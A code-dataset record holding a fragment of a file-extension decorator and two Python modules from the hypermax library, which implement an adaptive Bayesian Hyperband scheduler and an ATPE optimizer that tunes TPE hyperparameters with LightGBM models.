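        def decorator(converter):
            @wraps(converter)
            def wrapper(input_fn, *args, **kwargs):
                # try each candidate extension; call the converter on the
                # first file that exists, otherwise fall back to the input
                root, _ = os.path.splitext(input_fn)
                new_fn = input_fn
                for ext in exts:
                    candidate = root + ext
                    if os.path.exists(candidate):
                        new_fn = candidate
                        break
                out = converter(new_fn, *args, **kwargs)
                # mirror convert(): always hand back a list of dicts
                return [out] if isinstance(out, dict) else out
            return wrapper
        return decorator

    @with_extensions(['.mid', '.midi'])
    def load_ground_truth(fn):
        # hypothetical converter: would parse `fn` and return a ground-truth dict
        return {"path": fn}

    return load_ground_truth("song.wav")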
``` |
{
"source": "00sapo/hypermax",
"score": 2
} |
#### File: hypermax/algorithms/adaptive_bayesian_hyperband_optimizer.py
```python
import numpy as np
import random
from math import log, ceil
from time import time, ctime
from .optimization_algorithm_base import OptimizationAlgorithmBase
from .random_search_optimizer import RandomSearchOptimizer
from pprint import pprint
from ..hyperparameter import Hyperparameter
import hyperopt
import json
import functools
import copy
class AdaptiveBayesianHyperband(OptimizationAlgorithmBase):
""" This algorithm combines our ATPE optimizer with Hyperband"""
def __init__(self, baseOptimizer, min_budget, max_budget, eta = 3):
self.baseOptimizer = baseOptimizer
self.randomOptimizer = RandomSearchOptimizer()
self.min_budget = min_budget
self.max_budget = max_budget # maximum iterations per configuration
self.eta = eta # defines configuration downsampling rate (default = 3)
self.logeta = lambda x: log(x) / log(self.eta)
self.s_max = int(self.logeta(self.max_budget))
self.B = (self.s_max + 1) * self.max_budget
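        # (editor's note) B above is, in standard Hyperband notation, the approximate total budget allotted to each successive-halving bracket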
self.results = [] # list of dicts
@classmethod
def configurationSchema(self):
return {}
def createBudgetSchedule(self):
runs = []
for s in reversed( range( self.s_max + 1 )):
# initial number of configurations
n = self.B / self.max_budget / (s + 1) * self.eta ** s
# initial amount of budget per config
r = self.max_budget * self.eta ** (-s)
runs_in_sequence = 0
if round(r) >= self.min_budget:
for i in range(( s + 1 )):
# Run each of the n configs for <iterations>
# and keep best (n_configs / eta) configurations
n_configs = n * self.eta ** ( -i )
n_budget = r * self.eta ** ( i )
runs.append({
"group": s,
"round": runs_in_sequence,
"configs_start": int(round(n_configs)),
"configs_finish": int(round(n_configs / self.eta)),
"input_configs": int(round(n_configs * self.eta)),
"input_round": runs_in_sequence - 1,
"input_budget": -1 if i == 0 else int(ceil(r * self.eta ** ( i - 1 ))),
"budget": int(round(n_budget))
})
runs_in_sequence += 1
return runs
# return self.results
def createCanonicalStringFromResult(self, result, hyperparameterSpace):
params = Hyperparameter(hyperparameterSpace).convertToStructuredValues(result)
keys = list(params.keys())
for key in keys:
if key in OptimizationAlgorithmBase.resultInformationKeys or key.startswith('$'):
del params[key]
return json.dumps(params, sort_keys=True)
def createCanonicalStringFromParameters(self, params, hyperparameterSpace):
newResult = Hyperparameter(hyperparameterSpace).convertToFlatValues(params)
return self.createCanonicalStringFromResult(newResult, hyperparameterSpace)
def recommendNextParameters(self, hyperparameterSpace, results, currentTrials, lockedValues=None):
runs = self.createBudgetSchedule()
space = Hyperparameter(hyperparameterSpace)
finishedAndRunningResults = [result for result in results if result['loss'] is not None] + [space.convertToFlatValues(trial['params']) for trial in currentTrials]
runsNeeded = []
loopResults = []
loop = None
# Find which is the largest $loop we find in the results
if len(finishedAndRunningResults) == 0:
loop = 0
runsNeeded = sorted(runs, key=lambda run: run['budget'])
else:
maxLoop = max([result['$loop'] for result in finishedAndRunningResults])
for loopToTest in range(maxLoop+1):
loopResults = [result for result in finishedAndRunningResults if result['$loop'] == loopToTest]
# Define which secondary halving runs have enough data to operate
runsNeeded = []
for run in runs:
if run['input_round'] != -1:
inputResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['input_round'] and ('loss' in result))]
if len(inputResultsForRun) < run['input_configs']:
continue
resultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['round'])]
if len(resultsForRun) < run['configs_start']:
runsNeeded.append(run)
runsNeeded = sorted(runsNeeded, key=lambda run: (-run['group'], -run['budget']))
if len(runsNeeded) > 0:
loop = loopToTest
break
if loop is None:
loop = maxLoop
if len(runsNeeded) == 0:
runsNeeded = sorted(runs, key=lambda run: run['budget'])
loop += 1
run = runsNeeded[0]
if run['input_round'] == -1:
resultsForReccomendation = [result for result in results if result['$budget'] == run['budget']]
if random.uniform(0, 1) < 0.3:
params = self.randomOptimizer.recommendNextParameters(hyperparameterSpace, resultsForReccomendation, currentTrials)
else:
params = self.baseOptimizer.recommendNextParameters(hyperparameterSpace, resultsForReccomendation, currentTrials)
params['$budget'] = run['budget']
params['$loop'] = loop
params['$group'] = run['group']
params['$round'] = run['round']
return params
else:
inputResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['input_round'])]
inputResultsForRun = sorted(inputResultsForRun, key=lambda result: result['loss'])[0:run['configs_start']]
existingResultsForRun = [result for result in loopResults if (result['$group'] == run['group'] and result['$round'] == run['round'])]
inputCanonicalStrings = [self.createCanonicalStringFromResult(result, hyperparameterSpace) for result in inputResultsForRun]
existingCanonicalStrings = [self.createCanonicalStringFromResult(result, hyperparameterSpace) for result in existingResultsForRun]
neededCanonicalStrings = set(inputCanonicalStrings).difference(existingCanonicalStrings)
neededResults = [inputResultsForRun[inputCanonicalStrings.index(resultString)] for resultString in neededCanonicalStrings]
chosenResult = random.choice(neededResults)
params = space.convertToStructuredValues(chosenResult)
params['$budget'] = run['budget']
params['$loop'] = loop
params['$group'] = run['group']
params['$round'] = run['round']
return params
```
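The bracket arithmetic in `createBudgetSchedule` follows the standard Hyperband recipe: each bracket `s` starts `n` configurations on a small budget `r` and repeatedly keeps roughly the best `1/eta` fraction while multiplying the budget by `eta`. The standalone sketch below reproduces that arithmetic outside the class so the schedule can be inspected; it is an editor's illustration, and the budget values are example numbers, not hypermax defaults.

```python
from math import log

def budget_schedule(min_budget=1, max_budget=27, eta=3):
    """Reproduce the successive-halving schedule used by the class above."""
    s_max = int(log(max_budget) / log(eta))
    B = (s_max + 1) * max_budget
    runs = []
    for s in reversed(range(s_max + 1)):
        n = B / max_budget / (s + 1) * eta ** s  # initial number of configs
        r = max_budget * eta ** (-s)             # initial budget per config
        if round(r) < min_budget:
            continue
        for i in range(s + 1):
            runs.append({
                "group": s,
                "round": i,
                "configs": int(round(n * eta ** (-i))),
                "budget": int(round(r * eta ** i)),
            })
    return runs

if __name__ == '__main__':
    for run in budget_schedule():
        print(run)
    # bracket 3: 27 configs at budget 1, then 9 at 3, 3 at 9, 1 at 27, and so on
```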
#### File: hypermax/algorithms/atpe_optimizer.py
```python
from .optimization_algorithm_base import OptimizationAlgorithmBase
import hyperopt
import functools
import random
import numpy
import numpy.random
import json
import pkg_resources
from hypermax.hyperparameter import Hyperparameter
import sklearn
import lightgbm
import scipy.stats
import math
from pprint import pprint
import copy
import hypermax.file_utils
class ATPEOptimizer(OptimizationAlgorithmBase):
atpeParameters = [
'gamma',
'nEICandidates',
'resultFilteringAgeMultiplier',
'resultFilteringLossRankMultiplier',
'resultFilteringMode',
'resultFilteringRandomProbability',
'secondaryCorrelationExponent',
'secondaryCorrelationMultiplier',
'secondaryCutoff',
'secondaryFixedProbability',
'secondaryLockingMode',
'secondaryProbabilityMode',
'secondaryTopLockingPercentile',
]
atpeParameterCascadeOrdering = [
'resultFilteringMode',
'secondaryProbabilityMode',
'secondaryLockingMode',
'resultFilteringAgeMultiplier',
'resultFilteringLossRankMultiplier',
'resultFilteringRandomProbability',
'secondaryTopLockingPercentile',
'secondaryCorrelationExponent',
'secondaryCorrelationMultiplier',
'secondaryFixedProbability',
'secondaryCutoff',
'gamma',
'nEICandidates'
]
atpeParameterValues = {
'resultFilteringMode': ['age', 'loss_rank', 'none', 'random'],
'secondaryLockingMode': ['random', 'top'],
'secondaryProbabilityMode': ['correlation', 'fixed']
}
atpeModelFeatureKeys = [
'all_correlation_best_percentile25_ratio',
'all_correlation_best_percentile50_ratio',
'all_correlation_best_percentile75_ratio',
'all_correlation_kurtosis',
'all_correlation_percentile5_percentile25_ratio',
'all_correlation_skew',
'all_correlation_stddev_best_ratio',
'all_correlation_stddev_median_ratio',
'all_loss_best_percentile25_ratio',
'all_loss_best_percentile50_ratio',
'all_loss_best_percentile75_ratio',
'all_loss_kurtosis',
'all_loss_percentile5_percentile25_ratio',
'all_loss_skew',
'all_loss_stddev_best_ratio',
'all_loss_stddev_median_ratio',
'log10_cardinality',
'recent_10_correlation_best_percentile25_ratio',
'recent_10_correlation_best_percentile50_ratio',
'recent_10_correlation_best_percentile75_ratio',
'recent_10_correlation_kurtosis',
'recent_10_correlation_percentile5_percentile25_ratio',
'recent_10_correlation_skew',
'recent_10_correlation_stddev_best_ratio',
'recent_10_correlation_stddev_median_ratio',
'recent_10_loss_best_percentile25_ratio',
'recent_10_loss_best_percentile50_ratio',
'recent_10_loss_best_percentile75_ratio',
'recent_10_loss_kurtosis',
'recent_10_loss_percentile5_percentile25_ratio',
'recent_10_loss_skew',
'recent_10_loss_stddev_best_ratio',
'recent_10_loss_stddev_median_ratio',
'recent_15%_correlation_best_percentile25_ratio',
'recent_15%_correlation_best_percentile50_ratio',
'recent_15%_correlation_best_percentile75_ratio',
'recent_15%_correlation_kurtosis',
'recent_15%_correlation_percentile5_percentile25_ratio',
'recent_15%_correlation_skew',
'recent_15%_correlation_stddev_best_ratio',
'recent_15%_correlation_stddev_median_ratio',
'recent_15%_loss_best_percentile25_ratio',
'recent_15%_loss_best_percentile50_ratio',
'recent_15%_loss_best_percentile75_ratio',
'recent_15%_loss_kurtosis',
'recent_15%_loss_percentile5_percentile25_ratio',
'recent_15%_loss_skew',
'recent_15%_loss_stddev_best_ratio',
'recent_15%_loss_stddev_median_ratio',
'recent_25_correlation_best_percentile25_ratio',
'recent_25_correlation_best_percentile50_ratio',
'recent_25_correlation_best_percentile75_ratio',
'recent_25_correlation_kurtosis',
'recent_25_correlation_percentile5_percentile25_ratio',
'recent_25_correlation_skew',
'recent_25_correlation_stddev_best_ratio',
'recent_25_correlation_stddev_median_ratio',
'recent_25_loss_best_percentile25_ratio',
'recent_25_loss_best_percentile50_ratio',
'recent_25_loss_best_percentile75_ratio',
'recent_25_loss_kurtosis',
'recent_25_loss_percentile5_percentile25_ratio',
'recent_25_loss_skew',
'recent_25_loss_stddev_best_ratio',
'recent_25_loss_stddev_median_ratio',
'top_10%_correlation_best_percentile25_ratio',
'top_10%_correlation_best_percentile50_ratio',
'top_10%_correlation_best_percentile75_ratio',
'top_10%_correlation_kurtosis',
'top_10%_correlation_percentile5_percentile25_ratio',
'top_10%_correlation_skew',
'top_10%_correlation_stddev_best_ratio',
'top_10%_correlation_stddev_median_ratio',
'top_10%_loss_best_percentile25_ratio',
'top_10%_loss_best_percentile50_ratio',
'top_10%_loss_best_percentile75_ratio',
'top_10%_loss_kurtosis',
'top_10%_loss_percentile5_percentile25_ratio',
'top_10%_loss_skew',
'top_10%_loss_stddev_best_ratio',
'top_10%_loss_stddev_median_ratio',
'top_20%_correlation_best_percentile25_ratio',
'top_20%_correlation_best_percentile50_ratio',
'top_20%_correlation_best_percentile75_ratio',
'top_20%_correlation_kurtosis',
'top_20%_correlation_percentile5_percentile25_ratio',
'top_20%_correlation_skew',
'top_20%_correlation_stddev_best_ratio',
'top_20%_correlation_stddev_median_ratio',
'top_20%_loss_best_percentile25_ratio',
'top_20%_loss_best_percentile50_ratio',
'top_20%_loss_best_percentile75_ratio',
'top_20%_loss_kurtosis',
'top_20%_loss_percentile5_percentile25_ratio',
'top_20%_loss_skew',
'top_20%_loss_stddev_best_ratio',
'top_20%_loss_stddev_median_ratio',
'top_30%_correlation_best_percentile25_ratio',
'top_30%_correlation_best_percentile50_ratio',
'top_30%_correlation_best_percentile75_ratio',
'top_30%_correlation_kurtosis',
'top_30%_correlation_percentile5_percentile25_ratio',
'top_30%_correlation_skew',
'top_30%_correlation_stddev_best_ratio',
'top_30%_correlation_stddev_median_ratio',
'top_30%_loss_best_percentile25_ratio',
'top_30%_loss_best_percentile50_ratio',
'top_30%_loss_best_percentile75_ratio',
'top_30%_loss_kurtosis',
'top_30%_loss_percentile5_percentile25_ratio',
'top_30%_loss_skew',
'top_30%_loss_stddev_best_ratio',
'top_30%_loss_stddev_median_ratio'
]
def __init__(self):
scalingModelData = json.loads(pkg_resources.resource_string(__name__, "../atpe_models/scaling_model.json"))
self.featureScalingModels = {}
for key in self.atpeModelFeatureKeys:
self.featureScalingModels[key] = sklearn.preprocessing.StandardScaler()
self.featureScalingModels[key].scale_ = numpy.array(scalingModelData[key]['scales'])
self.featureScalingModels[key].mean_ = numpy.array(scalingModelData[key]['means'])
self.featureScalingModels[key].var_ = numpy.array(scalingModelData[key]['variances'])
self.parameterModels = {}
self.parameterModelConfigurations = {}
for param in self.atpeParameters:
modelData = pkg_resources.resource_string(__name__, "../atpe_models/model-" + param + '.txt')
with hypermax.file_utils.ClosedNamedTempFile(modelData) as model_file_name:
self.parameterModels[param] = lightgbm.Booster(model_file=model_file_name)
configString = pkg_resources.resource_string(__name__, "../atpe_models/model-" + param + '-configuration.json')
data = json.loads(configString)
self.parameterModelConfigurations[param] = data
self.lastATPEParameters = None
self.lastLockedParameters = []
self.atpeParamDetails = None
def recommendNextParameters(self, hyperparameterSpace, results, currentTrials, lockedValues=None):
rstate = numpy.random.RandomState(seed=int(random.randint(1, 2 ** 32 - 1)))
params = {}
def sample(parameters):
nonlocal params
params = parameters
return {"loss": 0.5, 'status': 'ok'}
parameters = Hyperparameter(hyperparameterSpace).getFlatParameters()
if lockedValues is not None:
# Remove any locked values from ones the optimizer will examine
parameters = list(filter(lambda param: param.name not in lockedValues.keys(), parameters))
log10_cardinality = Hyperparameter(hyperparameterSpace).getLog10Cardinality()
initializationRounds = max(10, int(log10_cardinality))
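        # (editor's note) until this many results are available, the learned ATPE models are skipped and the fixed default atpeParams below are used (plain TPE warm-up)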
atpeParams = {}
atpeParamDetails = {}
if len(list(result for result in results if result['loss'])) < initializationRounds:
atpeParams = {
'gamma': 1.0,
'nEICandidates': 24,
'resultFilteringAgeMultiplier': None,
'resultFilteringLossRankMultiplier': None,
'resultFilteringMode': "none",
'resultFilteringRandomProbability': None,
'secondaryCorrelationExponent': 1.0,
'secondaryCorrelationMultiplier': None,
'secondaryCutoff': 0,
'secondarySorting': 0,
'secondaryFixedProbability': 0.5,
'secondaryLockingMode': 'top',
'secondaryProbabilityMode': 'fixed',
'secondaryTopLockingPercentile': 0
}
else:
# Calculate the statistics for the distribution
stats = self.computeAllResultStatistics(hyperparameterSpace, results)
stats['num_parameters'] = len(parameters)
stats['log10_cardinality'] = Hyperparameter(hyperparameterSpace).getLog10Cardinality()
stats['log10_trial'] = math.log10(len(results))
baseVector = []
for feature in self.atpeModelFeatureKeys:
scalingModel = self.featureScalingModels[feature]
transformed = scalingModel.transform([[stats[feature]]])[0][0]
baseVector.append(transformed)
baseVector = numpy.array([baseVector])
for atpeParamIndex, atpeParameter in enumerate(self.atpeParameterCascadeOrdering):
vector = copy.copy(baseVector)[0].tolist()
atpeParamFeatures = self.atpeParameterCascadeOrdering[:atpeParamIndex]
for atpeParamFeature in atpeParamFeatures:
# We have to insert a special value of -3 for any conditional parameters.
if atpeParamFeature == 'resultFilteringAgeMultiplier' and atpeParams['resultFilteringMode'] != 'age':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'resultFilteringLossRankMultiplier' and atpeParams['resultFilteringMode'] != 'loss_rank':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'resultFilteringRandomProbability' and atpeParams['resultFilteringMode'] != 'random':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'secondaryCorrelationMultiplier' and atpeParams['secondaryProbabilityMode'] != 'correlation':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'secondaryFixedProbability' and atpeParams['secondaryProbabilityMode'] != 'fixed':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature == 'secondaryTopLockingPercentile' and atpeParams['secondaryLockingMode'] != 'top':
vector.append(-3) # This is the default value inserted when parameters aren't relevant
elif atpeParamFeature in self.atpeParameterValues:
for value in self.atpeParameterValues[atpeParamFeature]:
vector.append(1.0 if atpeParams[atpeParamFeature] == value else 0)
else:
vector.append(float(atpeParams[atpeParamFeature]))
allFeatureKeysForATPEParamModel = copy.copy(self.atpeModelFeatureKeys)
for atpeParamFeature in atpeParamFeatures:
if atpeParamFeature in self.atpeParameterValues:
for value in self.atpeParameterValues[atpeParamFeature]:
allFeatureKeysForATPEParamModel.append(atpeParamFeature + "_" + value)
else:
allFeatureKeysForATPEParamModel.append(atpeParamFeature)
value = self.parameterModels[atpeParameter].predict([vector])[0]
featureContributions = self.parameterModels[atpeParameter].predict([vector], pred_contrib=True)[0]
atpeParamDetails[atpeParameter] = {
"value": None,
"reason": None
}
# Set the value
if atpeParameter in self.atpeParameterValues:
# Renormalize the predicted probabilities
config = self.parameterModelConfigurations[atpeParameter]
for atpeParamValueIndex, atpeParamValue in enumerate(self.atpeParameterValues[atpeParameter]):
value[atpeParamValueIndex] = (((value[atpeParamValueIndex] - config['predMeans'][atpeParamValue]) / config['predStddevs'][atpeParamValue]) *
config['origStddevs'][atpeParamValue]) + config['origMeans'][atpeParamValue]
value[atpeParamValueIndex] = max(0.0, min(1.0, value[atpeParamValueIndex]))
maxVal = numpy.max(value)
for atpeParamValueIndex, atpeParamValue in enumerate(self.atpeParameterValues[atpeParameter]):
value[atpeParamValueIndex] = max(value[atpeParamValueIndex], maxVal * 0.15) # We still allow the non reccomended modes to get chosen 15% of the time
# Make a random weighted choice based on the normalized probabilities
probabilities = value / numpy.sum(value)
chosen = numpy.random.choice(a=self.atpeParameterValues[atpeParameter], p=probabilities)
atpeParams[atpeParameter] = str(chosen)
else:
# Renormalize the predictions
config = self.parameterModelConfigurations[atpeParameter]
value = (((value - config['predMean']) / config['predStddev']) * config['origStddev']) + config['origMean']
atpeParams[atpeParameter] = float(value)
atpeParamDetails[atpeParameter]["reason"] = {}
# If we are predicting a class, we get separate feature contributions for each class. Take the average
if atpeParameter in self.atpeParameterValues:
featureContributions = numpy.mean(
numpy.reshape(featureContributions, newshape=(len(allFeatureKeysForATPEParamModel) + 1, len(self.atpeParameterValues[atpeParameter]))), axis=1)
contributions = [(self.atpeModelFeatureKeys[index], float(featureContributions[index])) for index in range(len(self.atpeModelFeatureKeys))]
contributions = sorted(contributions, key=lambda r: -r[1])
# Only focus on the top 10% of features, since it gives more useful information. Otherwise the total gets really squashed out over many features,
# because our model is highly regularized.
contributions = contributions[:int(len(contributions) / 10)]
total = numpy.sum([contrib[1] for contrib in contributions])
for contributionIndex, contribution in enumerate(contributions[:3]):
atpeParamDetails[atpeParameter]['reason'][contribution[0]] = str(int(float(contribution[1]) * 100.0 / total)) + "%"
# Apply bounds to all the parameters
if atpeParameter == 'gamma':
atpeParams['gamma'] = max(0.2, min(2.0, atpeParams['gamma']))
if atpeParameter == 'nEICandidates':
atpeParams['nEICandidates'] = int(max(2.0, min(48, atpeParams['nEICandidates'])))
if atpeParameter == 'resultFilteringAgeMultiplier':
atpeParams['resultFilteringAgeMultiplier'] = max(1.0, min(4.0, atpeParams['resultFilteringAgeMultiplier']))
if atpeParameter == 'resultFilteringLossRankMultiplier':
atpeParams['resultFilteringLossRankMultiplier'] = max(1.0, min(4.0, atpeParams['resultFilteringLossRankMultiplier']))
if atpeParameter == 'resultFilteringRandomProbability':
atpeParams['resultFilteringRandomProbability'] = max(0.7, min(0.9, atpeParams['resultFilteringRandomProbability']))
if atpeParameter == 'secondaryCorrelationExponent':
atpeParams['secondaryCorrelationExponent'] = max(1.0, min(3.0, atpeParams['secondaryCorrelationExponent']))
if atpeParameter == 'secondaryCorrelationMultiplier':
atpeParams['secondaryCorrelationMultiplier'] = max(0.2, min(1.8, atpeParams['secondaryCorrelationMultiplier']))
if atpeParameter == 'secondaryCutoff':
atpeParams['secondaryCutoff'] = max(-1.0, min(1.0, atpeParams['secondaryCutoff']))
if atpeParameter == 'secondaryFixedProbability':
atpeParams['secondaryFixedProbability'] = max(0.2, min(0.8, atpeParams['secondaryFixedProbability']))
if atpeParameter == 'secondaryTopLockingPercentile':
atpeParams['secondaryTopLockingPercentile'] = max(0, min(10.0, atpeParams['secondaryTopLockingPercentile']))
# Now blank out unneeded params so they don't confuse us
if atpeParams['secondaryLockingMode'] == 'random':
atpeParams['secondaryTopLockingPercentile'] = None
if atpeParams['secondaryProbabilityMode'] == 'fixed':
atpeParams['secondaryCorrelationMultiplier'] = None
else:
atpeParams['secondaryFixedProbability'] = None
if atpeParams['resultFilteringMode'] == 'none':
atpeParams['resultFilteringAgeMultiplier'] = None
atpeParams['resultFilteringLossRankMultiplier'] = None
atpeParams['resultFilteringRandomProbability'] = None
elif atpeParams['resultFilteringMode'] == 'age':
atpeParams['resultFilteringLossRankMultiplier'] = None
atpeParams['resultFilteringRandomProbability'] = None
elif atpeParams['resultFilteringMode'] == 'loss_rank':
atpeParams['resultFilteringAgeMultiplier'] = None
atpeParams['resultFilteringRandomProbability'] = None
elif atpeParams['resultFilteringMode'] == 'random':
atpeParams['resultFilteringAgeMultiplier'] = None
atpeParams['resultFilteringLossRankMultiplier'] = None
for atpeParameter in self.atpeParameters:
if atpeParams[atpeParameter] is None:
del atpeParamDetails[atpeParameter]
else:
atpeParamDetails[atpeParameter]['value'] = atpeParams[atpeParameter]
self.lastATPEParameters = atpeParams
self.atpeParamDetails = atpeParamDetails
# pprint(atpeParams)
def computePrimarySecondary():
if len(results) < initializationRounds:
return parameters, [], [0.5] * len(parameters) # Put all parameters as primary
if len(set(result['loss'] for result in results)) < 5:
return parameters, [], [0.5] * len(parameters) # Put all parameters as primary
numberParameters = [parameter for parameter in parameters if parameter.config['type'] == 'number']
otherParameters = [parameter for parameter in parameters if parameter.config['type'] != 'number']
totalWeight = 0
correlations = {}
for parameter in numberParameters:
if len(set(result[parameter.name] for result in results if result[parameter.name] is not None)) < 2:
correlations[parameter.name] = 0
else:
values = []
valueLosses = []
for result in results:
if result[parameter.name] is not None and result['loss'] is not None:
values.append(result[parameter.name])
valueLosses.append(result['loss'])
correlation = math.pow(abs(scipy.stats.spearmanr(values, valueLosses)[0]), atpeParams['secondaryCorrelationExponent'])
correlations[parameter.name] = correlation
totalWeight += correlation
threshold = totalWeight * abs(atpeParams['secondaryCutoff'])
if atpeParams['secondaryCutoff'] < 0:
# Reverse order - we lock in the highest correlated parameters
sortedParameters = sorted(numberParameters, key=lambda parameter: correlations[parameter.name])
else:
# Normal order - sort properties by their correlation to lock in lowest correlated parameters
sortedParameters = sorted(numberParameters, key=lambda parameter: -correlations[parameter.name])
primaryParameters = []
secondaryParameters = []
cumulative = totalWeight
for parameter in sortedParameters:
if cumulative < threshold:
secondaryParameters.append(parameter)
else:
primaryParameters.append(parameter)
cumulative -= correlations[parameter.name]
return primaryParameters + otherParameters, secondaryParameters, correlations
if len([result['loss'] for result in results if result['loss'] is not None]) == 0:
maxLoss = 1
else:
maxLoss = numpy.max([result['loss'] for result in results if result['loss'] is not None])
# We create a copy of lockedValues so we don't modify the object that was passed in as an argument - treat it as immutable.
# The ATPE algorithm will lock additional values in a stochastic manner
if lockedValues is None:
lockedValues = {}
else:
lockedValues = copy.copy(lockedValues)
filteredResults = []
removedResults = []
if len(results) > initializationRounds:
primaryParameters, secondaryParameters, correlations = computePrimarySecondary()
self.lastLockedParameters = []
sortedResults = list(sorted(list(results), key=lambda result: (result['loss'] if result['loss'] is not None else (maxLoss + 1))))
topResults = sortedResults
if atpeParams['secondaryLockingMode'] == 'top':
topResultsN = max(1, int(math.ceil(len(sortedResults) * atpeParams['secondaryTopLockingPercentile'] / 100.0)))
topResults = sortedResults[:topResultsN]
            # Any secondary parameter may be locked to either the current best value or any value within the result pool.
for secondary in secondaryParameters:
if atpeParams['secondaryProbabilityMode'] == 'fixed':
if random.uniform(0, 1) < atpeParams['secondaryFixedProbability']:
self.lastLockedParameters.append(secondary.name)
if atpeParams['secondaryLockingMode'] == 'top':
lockResult = random.choice(topResults)
if lockResult[secondary.name] is not None and lockResult[secondary.name] != "":
lockedValues[secondary.name] = lockResult[secondary.name]
elif atpeParams['secondaryLockingMode'] == 'random':
lockedValues[secondary.name] = self.chooseRandomValueForParameter(secondary)
elif atpeParams['secondaryProbabilityMode'] == 'correlation':
probability = max(0, min(1, abs(correlations[secondary.name]) * atpeParams['secondaryCorrelationMultiplier']))
if random.uniform(0, 1) < probability:
self.lastLockedParameters.append(secondary.name)
if atpeParams['secondaryLockingMode'] == 'top':
lockResult = random.choice(topResults)
if lockResult[secondary.name] is not None and lockResult[secondary.name] != "":
lockedValues[secondary.name] = lockResult[secondary.name]
elif atpeParams['secondaryLockingMode'] == 'random':
lockedValues[secondary.name] = self.chooseRandomValueForParameter(secondary)
# Now last step, we filter results prior to sending them into ATPE
for resultIndex, result in enumerate(results):
if atpeParams['resultFilteringMode'] == 'none':
filteredResults.append(result)
elif atpeParams['resultFilteringMode'] == 'random':
if random.uniform(0, 1) < atpeParams['resultFilteringRandomProbability']:
filteredResults.append(result)
else:
removedResults.append(result)
elif atpeParams['resultFilteringMode'] == 'age':
age = float(resultIndex) / float(len(results))
if random.uniform(0, 1) < (atpeParams['resultFilteringAgeMultiplier'] * age):
filteredResults.append(result)
else:
removedResults.append(result)
elif atpeParams['resultFilteringMode'] == 'loss_rank':
rank = 1.0 - (float(sortedResults.index(result)) / float(len(results)))
if random.uniform(0, 1) < (atpeParams['resultFilteringLossRankMultiplier'] * rank):
filteredResults.append(result)
else:
removedResults.append(result)
        # If we are in initialization, or if by some other fluke of randomness we end up with no results after filtering,
        # then just use all the results
if len(filteredResults) == 0:
filteredResults = results
hyperopt.fmin(fn=sample,
space=Hyperparameter(hyperparameterSpace).createHyperoptSpace(lockedValues),
algo=functools.partial(hyperopt.tpe.suggest, n_startup_jobs=initializationRounds, gamma=atpeParams['gamma'],
n_EI_candidates=int(atpeParams['nEICandidates'])),
max_evals=1,
trials=self.convertResultsToTrials(hyperparameterSpace, filteredResults),
rstate=rstate,
show_progressbar=False)
return params
def chooseRandomValueForParameter(self, parameter):
if parameter.config.get('mode', 'uniform') == 'uniform':
minVal = parameter.config['min']
maxVal = parameter.config['max']
if parameter.config.get('scaling', 'linear') == 'logarithmic':
minVal = math.log(minVal)
maxVal = math.log(maxVal)
value = random.uniform(minVal, maxVal)
if parameter.config.get('scaling', 'linear') == 'logarithmic':
value = math.exp(value)
if 'rounding' in parameter.config:
value = round(value / parameter.config['rounding']) * parameter.config['rounding']
        elif parameter.config.get('mode', 'uniform') == 'normal':
meanVal = parameter.config['mean']
stddevVal = parameter.config['stddev']
if parameter.config.get('scaling', 'linear') == 'logarithmic':
meanVal = math.log(meanVal)
stddevVal = math.log(stddevVal)
value = random.gauss(meanVal, stddevVal)
if parameter.config.get('scaling', 'linear') == 'logarithmic':
value = math.exp(value)
if 'rounding' in parameter.config:
value = round(value / parameter.config['rounding']) * parameter.config['rounding']
        elif parameter.config.get('mode', 'uniform') == 'randint':
max = parameter.config['max']
value = random.randint(0, max-1)
return value
def computePartialResultStatistics(self, hyperparameterSpace, results):
losses = numpy.array(sorted([result['loss'] for result in results if result['loss'] is not None]))
bestLoss = 0
percentile5Loss = 0
percentile25Loss = 0
percentile50Loss = 0
percentile75Loss = 0
statistics = {}
numpy.warnings.filterwarnings('ignore')
if len(set(losses)) > 1:
bestLoss = numpy.percentile(losses, 0)
percentile5Loss = numpy.percentile(losses, 5)
percentile25Loss = numpy.percentile(losses, 25)
percentile50Loss = numpy.percentile(losses, 50)
percentile75Loss = numpy.percentile(losses, 75)
statistics['loss_skew'] = scipy.stats.skew(losses)
statistics['loss_kurtosis'] = scipy.stats.kurtosis(losses)
else:
statistics['loss_skew'] = 0
statistics['loss_kurtosis'] = 0
if percentile50Loss == 0:
statistics['loss_stddev_median_ratio'] = 0
statistics['loss_best_percentile50_ratio'] = 0
else:
statistics['loss_stddev_median_ratio'] = numpy.std(losses) / percentile50Loss
statistics['loss_best_percentile50_ratio'] = bestLoss / percentile50Loss
if bestLoss == 0:
statistics['loss_stddev_best_ratio'] = 0
else:
statistics['loss_stddev_best_ratio'] = numpy.std(losses) / bestLoss
if percentile25Loss == 0:
statistics['loss_best_percentile25_ratio'] = 0
statistics['loss_percentile5_percentile25_ratio'] = 0
else:
statistics['loss_best_percentile25_ratio'] = bestLoss / percentile25Loss
statistics['loss_percentile5_percentile25_ratio'] = percentile5Loss / percentile25Loss
if percentile75Loss == 0:
statistics['loss_best_percentile75_ratio'] = 0
else:
statistics['loss_best_percentile75_ratio'] = bestLoss / percentile75Loss
def getValue(result, parameter):
return result[parameter.name]
# Now we compute correlations between each parameter and the loss
parameters = Hyperparameter(hyperparameterSpace).getFlatParameters()
correlations = []
for parameter in parameters:
if parameter.config['type'] == 'number':
if len(set(getValue(result, parameter) for result in results if (getValue(result, parameter) is not None and result['loss'] is not None))) < 2:
correlations.append(0)
else:
values = []
valueLosses = []
for result in results:
if result['loss'] is not None and (isinstance(getValue(result, parameter), float) or isinstance(getValue(result, parameter), int)):
values.append(getValue(result, parameter))
valueLosses.append(result['loss'])
correlation = abs(scipy.stats.spearmanr(values, valueLosses)[0])
if math.isnan(correlation) or math.isinf(correlation):
correlations.append(0)
else:
correlations.append(correlation)
correlations = numpy.array(correlations)
if len(set(correlations)) == 1:
statistics['correlation_skew'] = 0
statistics['correlation_kurtosis'] = 0
statistics['correlation_stddev_median_ratio'] = 0
statistics['correlation_stddev_best_ratio'] = 0
